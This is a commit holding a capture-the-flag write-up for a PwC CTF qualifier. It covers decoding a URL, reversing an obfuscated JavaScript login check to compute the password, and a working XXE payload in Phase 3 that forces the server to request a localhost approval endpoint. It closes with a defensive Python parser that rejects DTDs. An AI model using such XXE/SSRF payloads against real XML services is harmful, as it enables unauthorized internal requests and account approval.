Commit cda57fe7 authored by Cool Fire (HN)

Initial commit

# Phase 1
The logo contains text that encodes the URL for the next phase. We just need to search/replace out the `PwC-` blocks and the extra `-` characters to get the URL we need: `https://prequal.pwctf.com/login.php?uid=32177e59ac87d481b8ad10a69c811537`.
# Phase 2
Protip: tell Chrome to ignore that one breakpoint that triggers every second.
There is an obfuscated JS section at the end of one of the JS files; let Firefox Scratchpad run it and print the result with `console.log()` to get this deobfuscated function:
```
function login() {
  var key = "i want to win the pwctf!";
  // The uid is taken straight from the query string (?uid=...)
  var uid = document.location.search.split('=')[1];
  var username = document.getElementsByName('username')[0].value;
  var password = document.getElementsByName('password')[0].value;
  var value = [];
  // Each uid character is XORed with every key character, then with its own index
  for (var i = 0; i < uid.length; i++) {
    var charCode = uid.charCodeAt(i);
    for (var j = 0; j < key.length; j++) {
      charCode ^= key.charCodeAt(j);
    }
    charCode ^= i;
    value.push(charCode);
  }
  // Note: map() passes (element, index, array) to String.fromCharCode, so every
  // entry becomes a three-character chunk; the expected password depends on this quirk.
  if (username === "PwCTF" && password === btoa(value.map(String.fromCharCode).join(""))) {
    window.location.replace("/register.php?token=" + md5(password.split("").reverse().join("")));
  }
}
```
Then simplify the code down a little and stick your uid in it to calculate and print the correct pass:
```
var key = 'i want to win the pwctf!';
// Put your own uid (from the login URL) here
var uid = '32177e59ac87d481b8ad10a69c811537';
var value = [];
for (var i = 0; i < uid.length; i++) {
  var charCode = uid.charCodeAt(i);
  for (var j = 0; j < key.length; j++) {
    charCode ^= key.charCodeAt(j);
  }
  charCode ^= i;
  value.push(charCode);
}
// Same map()/btoa() construction as the original, so the output matches what login() expects
console.log(btoa(value.map(String.fromCharCode).join("")));
```
This prints the password to use in your console: `ZAAAOAEAMwIAMwMANQQAPQUAYAYAYwcAaggAOwkAbAoAPgsAbQwAPg0APg4Aaw8AIRAAIREAKxIAIBMAIBQAJRUAdRYAIRcALRgAfRkAexoALxsAJRwAeR0AKR4ALR8A`.
The username should obviously be `PwCTF`.
# Phase 3
The registration page sends XML data in a POST request, so we can use XXE (an external entity pointing at localhost) to get the server's XML parser to make an HTTP request from localhost to localhost on our behalf.
Replay the request through Burp with the XXE payload included:
```
<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY sp SYSTEM "http://localhost/approve.php?session=s%253Ae2Efka7vpc4DUXWg5MsXft21xgkAvYGM.EFMK13ksf8irpWSMkZk3bcwWL4URZLZnytaBPeZbrv8">]><user><name>cFire</name><email>coolfire@insomnia247.nl</email></user><r>&sp;</r>
```
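How a registration endpoint could shut this door, as an added example that is not part of the original writeup: an expat-based parser that aborts on the DOCTYPE declaration, so no entity (internal or external) is ever declared, with external entity fetching disabled as a second layer. The request bodies are constructed here; the DTD-bearing one reuses the writeup's prelude with a placeholder session value.

```python
import xml.parsers.expat

# Constructed request bodies (not captured traffic); the second carries the DOCTYPE/ENTITY prelude.
CLEAN_BODY = (
    '<?xml version="1.0" ?>'
    "<user><name>cFire</name><email>coolfire@insomnia247.nl</email></user>"
)
XXE_BODY = (
    '<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY >'
    '<!ENTITY sp SYSTEM "http://localhost/approve.php?session=SESSION_PLACEHOLDER">]>'
    "<user><name>cFire</name><email>coolfire@insomnia247.nl</email></user><r>&sp;</r>"
)

class DoctypeForbidden(ValueError):
    """Raised when a request body carries a DTD, the only place an entity can be declared."""

def parse_registration(body: str) -> dict:
    """Extract name and email from a <user> document, refusing any DOCTYPE up front."""
    fields, path, text = {}, [], []
    parser = xml.parsers.expat.ParserCreate()

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before any entity is declared, so nothing can be resolved later.
        raise DoctypeForbidden(f"DOCTYPE {name!r} rejected: DTDs are not accepted")

    def start(name, attrs):
        path.append(name)
        text.clear()

    def end(name):
        if path == ["user", name] and name in ("name", "email"):
            fields[name] = "".join(text).strip()
        path.pop()

    parser.StartDoctypeDeclHandler = forbid_doctype
    # Defence in depth: should a DTD ever get through, never fetch external entities.
    parser.ExternalEntityRefHandler = lambda context, base, system_id, public_id: 0
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)
    return fields

def rejects_dtd(body: str) -> bool:
    # True when the body is refused because it carries a DOCTYPE.
    try:
        parse_registration(body)
    except DoctypeForbidden:
        return True
    return False
```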